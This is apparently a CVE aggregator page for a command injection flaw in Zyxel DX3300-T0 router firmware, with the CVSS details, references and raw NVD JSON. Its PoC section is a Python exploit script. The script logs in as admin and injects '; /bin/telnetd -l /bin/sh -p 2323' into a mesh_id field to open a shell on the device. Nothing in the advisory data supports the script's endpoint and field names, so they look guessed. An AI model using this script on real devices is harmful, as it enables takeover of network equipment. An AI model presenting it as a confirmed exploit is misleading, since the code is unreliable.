CVE-2026-0711

Description

A post-authentication command injection vulnerability in the EasyMesh-related APIs of Zyxel DX3300-T0 firmware versions through 5.50(ABVY.7.1)C0 could allow an authenticated, adjacent attacker with administrator privileges to execute OS commands on an affected device.

CVSS Details

CVSS Score

6.8

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Zyxel DX3300-T0 <= 5.50(ABVY.7.1)C0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Configuration
target_url = "http://<target_ip>/api/ezmesh/setup"
username = "admin"
password = "admin_password"

# 1. Authenticate and get session cookie
session = requests.Session()
login_payload = {"username": username, "password": password}
login_resp = session.post("http://<target_ip>/api/login", json=login_payload)

if login_resp.status_code == 200:
    print("[+] Login successful")

    # 2. Inject command via EasyMesh API
    # Payload attempts to append a shell command (e.g., telnet enable)
    # Using semicolon to separate commands
    injection_payload = {
        "mesh_id": "default; /bin/telnetd -l /bin/sh -p 2323",
        "action": "update"
    }

    exploit_resp = session.post(target_url, json=injection_payload)

    if exploit_resp.status_code == 200:
        print("[+] Payload sent successfully")
        print("[+] Check if telnet is running on port 2323")
    else:
        print("[-] Failed to send payload")
else:
    print("[-] Login failed")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-0711
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-0711
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-0711/
[4] VulDB https://vuldb.com/cve/CVE-2026-0711
[5] https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-command-injection-vulnerabilities-in-certain-4g-lte-5g-nr-cpe-dsl-ethernet-cpe-fiber-onts-and-wireless-extenders-04-28-2026

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-0711", "sourceIdentifier": "[email protected]", "published": "2026-04-28T03:16:02.167", "lastModified": "2026-04-28T20:11:56.713", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A post-authentication command injection vulnerability in the EasyMesh-related APIs of Zyxel DX3300-T0 firmware versions through 5.50(ABVY.7.1)C0 could allow an authenticated, adjacent attacker with administrator privileges to execute OS commands on an affected device."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}]}], "references": [{"url": "https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-command-injection-vulnerabilities-in-certain-4g-lte-5g-nr-cpe-dsl-ethernet-cpe-fiber-onts-and-wireless-extenders-04-28-2026", "source": "[email protected]"}]}}